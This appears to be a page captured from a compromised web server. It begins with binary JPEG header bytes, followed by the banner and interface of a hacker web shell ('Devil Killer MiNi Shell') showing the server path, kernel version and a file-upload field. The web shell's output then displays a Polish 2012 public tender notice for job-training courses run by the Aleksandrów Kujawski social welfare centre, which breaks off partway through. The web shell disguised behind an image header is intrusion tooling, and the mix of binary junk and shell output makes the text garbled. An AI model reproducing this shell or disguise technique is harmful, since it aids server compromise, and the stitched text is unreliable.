JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120420/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120420/90889-N-2012.html

<p class="kh_header"><b>Aleksandrów Kujawski: Aktywizacja zawodowa i społeczna klientów MOPS Zaufaj Nam</b><br>
<b>Numer ogłoszenia: 90889 - 2012; data zamieszczenia: 20.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy  Społecznej , ul. Słowackiego 12, 87-700 Aleksandrów Kujawski, woj. kujawsko-pomorskie, tel. 54 282 61 49, 282 61 48, faks 54 282 61 48.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Aktywizacja zawodowa i społeczna klientów MOPS Zaufaj Nam.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem zamówienia jest przeprowadzenie szkoleń, realizowanych przez Miejski Ośrodek Pomocy Społecznej w Aleksandrowie Kujawskim, w ramach projektu systemowego pt.: Aktywizacja zawodowa i społeczna klientów MOPS Zaufaj Nam. 

3.2. Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013. 
Priorytet VII Promocja integracji społecznej.      
Działanie 7.1  Rozwój i upowszechnienie aktywnej integracji.
Poddziałanie.7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej. 
 
3.3. W szkoleniu wezmą udział łącznie 42 osoby (kobiety i mężczyźni), klienci Miejskiego Ośrodka Pomocy Społecznej  w Aleksandrowie Kujawskim, w tym:
  -  34 osoby objęte będą doradztwem zawodowym i wezmą udział  w warsztatach psychologicznych oraz kursach zawodowych   (4 osoby wezmą udział w 2 kursach) 
   -    8 osób będzie objętych Programem Aktywności Lokalnej - osoby niepełnosprawne i członkowie rodzin, w których funkcjonują osoby niepełnosprawne.

3.4. Zamówienie realizowane będzie w formie szkoleń w zakresach tematycznych, z których każdy stanowi odrębną część:
Część 1 - Warsztaty psychologiczne  -  34 osoby, 10 godz.,
Część 2 - Doradztwo zawodowe - 34 osoby, 10 godz,
Część 3 - Kurs - Prawo jazdy kategorii B - z uwzględnieniem pierwszego egzaminu - 5 osób,  60 godz,
Część 4 - Kurs - Sprzedawca z obsługą kasy fiskalnej - 9 osób, 120 godz.
Część 5 - Kurs - Opiekun osób starszych, chorych, niepełnosprawnych i dzieci- 3 osoby,  165 godz.,
Część 6 - Kurs - Kucharz - kelner - barman - 10 osób, 240 godz.
Część 7 - Kurs - Malarz - tapeciarz - 3 osoby, 150 godz.
Część 8 - Kurs - Brukarz - monter nawierzchni drogowych - 3 osoby,  250 godz.
Część 9 - Kurs - Spawanie elektrodami otulonymi blach i rur - spoiny pachwinowe - 5 osób, 171 godz.
Część 10 - Skierowanie do Klubu Integracji Społecznej w ramach PAL 8 osób,  64 godz. i  jednodniowa wycieczka..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0, 85.12.12.70-6, 85.31.23.20-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli Wykonawca  złoży oświadczenie, zgodne z załącznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie minimum dwa szkolenia grupowe przy grupie minimalnej 10 osób, odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli Wykonawca posiada warunki do odbycia  praktycznej nauki zawodu, tj warsztaty pracy, narzędzia, dostęp do pomieszczeń dla szkoleń praktycznych oraz pomieszczeń sanitarnych (WC dla kobiet i dla mężczyzn) .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia  będzie spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował odpowiednio wykwalifikowanymi osobami, tj. wykładowcami z odpowiednim wykształceniem i kwalifikacjami umożliwiającymi prowadzenie szkoleń w określonych dziedzinach. Przez wymagane minimalne doświadczenie zawodowe danego wykładowcy (dla każdego z prowadzonych szkoleń zawodowych) rozumie się pięcioletni staż zawodowy jako  wykładowca.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek pozostawania w  sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia zostanie spełniony, jeżeli Wykonawca  złoży oświadczenie,  zgodnie  z załącznikiem nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) formularz cenowy - załącznik nr 7,
2) stosowne pełnomocnictwo, jeżeli upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru,
3) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu  i zawarcia umowy w sprawie niniejszego zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.aleksandrowkujawski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
ul. Słowackiego 12
87-700 Aleksandrów Kujawski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2012 godzina 12:00, miejsce: Miejski Ośrodek Pomocy Społecznej
ul. Słowackiego 12
87-700 Aleksandrów Kujawski.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program  Operacyjny Kapitał Ludzki 2007-2013        
 Priorytet VII. Promocja Integracji Społecznej 
Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji 
Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji 
przez ośrodki pomocy społecznej 
Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Warsztaty psychologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W szkoleniu wezmą udział 34 osoby - zajęcia grupowe
Całkowita liczba godzin - 10
Termin realizacji szkolenia - maj 2012 r.
Tematyka:
- budowanie poczucia własnej wartości.
- radzenie sobie ze stresem.
- komunikacja interpersonalna.
- postawa asertywna.
- autoprezentacja
Inne działania:
- materiały szkoleniowe,
- ubezpieczenie uczestników warsztatów,
- catering dla uczestników warsztatów (ciastka, zimne napoje, kawa, herbata).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Doradztwo zawodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W szkoleniu wezmą udział 34 osoby - zajęcia grupowe
Całkowita liczba godzin - 10
Termin realizacji szkolenia  - maj 2012 r.
Tematyka
- zasady pracy w grupie,
- reakcja na utratę pracy,
- analiza niepowodzeń w poszukiwaniu pracy,
- określenie umiejętności, możliwości i predyspozycji zawodowych każdego uczestnika,
- rynek pracy - mity i rzeczywistość,
- własna firma,
- znajdowanie ofert pracy,
- przygotowanie do rozmowy z pracodawcą,
- rozmowa kwalifikacyjna,
- przygotowanie dokumentów aplikacyjnych: CV i list motywacyjny,
- określenie predyspozycji zawodowych,
 Inne działania:
-materiały szkoleniowe,
- ubezpieczenie uczestników warsztatów,
- catering dla uczestników warsztatów (ciastka, zimne napoje, kawa, herbata).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Prawo jazdy kategorii B - z uwzględnieniem pierwszego egzaminu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W kursie weźmie udział 5 osób
 Ilość godzin szkolenia  -  60 godzin/os., w tym 30 godzin dydaktycznych   i  30 godzin praktycznych  
Termin realizacji szkolenia  -  czerwiec-sierpień 2012 r.
Zakres:
- zajęcia teoretyczne,
- indywidualne zajęcia praktyczne (tzw. jazdy),
- przeprowadzenie egzaminu wewnętrznego przed  zgłoszeniem do egzaminu Państwowego 
- badania lekarskie przeprowadzone przed przystąpieniem do kursu. 



Materiały szkoleniowe
Wykonawca zapewnia:  sprzęt niezbędny do przeprowadzenia szkolenia, materiały 
szkoleniowe (podręczniki i płyty CD z testami egzaminacyjnymi, w tym jeden dodatkowy do dokumentacji projektu),  egzamin. W koszt Kursu należy wliczyć opłatę za pierwszy egzamin teoretyczny i praktyczny. 
Inne działania:
- dojazd uczestników do miejsca zajęć praktycznych,
- materiały szkoleniowe,
- ubezpieczenie uczestników kursu,
- catering dla uczestników kursu (obiad, ciastka, zimne napoje, kawa, herbata)
Uzyskane dokumenty:
- zaświadczenie ukończenia kursu prawa jazdy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Sprzedawca z obsługą kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W szkoleniu weźmie udział 9  osób 
Całkowita liczba godzin -  120, w tym: teoria - 100 godzin,  praktyka  -  20 godzin,
Termin realizacji - czerwiec -sierpień 2012 r.
Tematyka
- technologia sprzedaży,
- towaroznawstwo,
- obsługa klienta,
- marketing sprzedażowy i reklama,
- obsługa kas fiskalnych
Inne działania:
- dojazd uczestników do miejsca zajęć praktycznych,
- ubezpieczenie uczestników kursu,
- catering dla uczestników kursu (obiad, ciastka, zimne napoje, kawa, herbata)
Uzyskane dokumenty:
- zaświadczenie wydane na druku Ministerstwa Edukacji Narodowej
- dwa dyplomy w języku polskim i angielskim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Opiekun osób starszych, chorych, niepełnosprawnych i dzieci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W kursie wezmą udział 3 osoby
Ilość godzin: - 165, w tym:  teoria - 65 godzin, praktyka - 100 godzin,
Termin realizacji - lipiec-sierpień 2012 r. 
Tematyka:
- wybrane zagadnienia prawne
-organizacja pracy własnej,
- psychospołeczne aspekty opieki.
- podstawy psychologii i pedagogiki w opiece nad dziećmi,
- pomoc przedlekarska,
- opieka nad podopiecznym, 
- opieka, pielęgnacja i higiena dziecka,
- gerontologia, 
- dietetyka i przygotowanie posiłków,
- publiczna służba zdrowia oraz system pomocy społecznej, 
- etyka w zawodzie opiekunki,
-zajęcia praktyczne.
 Inne działania:
- dojazd uczestników do miejsca zajęć praktycznych,
- ubezpieczenie uczestników kursu,
- catering dla uczestników kursu (obiad, ciastka, zimne napoje, kawa, herbata)Uzyskane dokumenty:
- zaświadczenie wydane  na druku Ministerstwa Edukacji Narodowej,
- dwa dyplomy - w języku polskim i angielskim..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kucharz - kelner - barman.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W kursie weźmie udział 10 osób
Ilość godzin: 240, w tym teoria - 100 godzin, praktyka - 140 godzin,
Termin realizacji -  sierpień - wrzesień 2012 r. 
Tematyka:
- technologia gastronomiczna,
- towaroznawstwo spożywcze,
- zasady żywienia,
- techniki przyrządzania napojów,
- obsługa konsumenta,
- zajęcia praktyczne
 Inne działania:
- dojazd uczestników do miejsca zajęć praktycznych,
- ubezpieczenie uczestników kursu,
- catering dla uczestników kursu (obiad, ciastka, zimne napoje, kawa, herbata)
Uzyskane dokumenty:
zaświadczenie wydane na druku Ministerstwa Edukacji Narodowej
dwa dyplomy - w języku polskim i angielskim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Malarz - tapeciarz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W kursie wezmą udział 3 osoby 
Termin realizacji: wrzesień - październik 2012 r. 
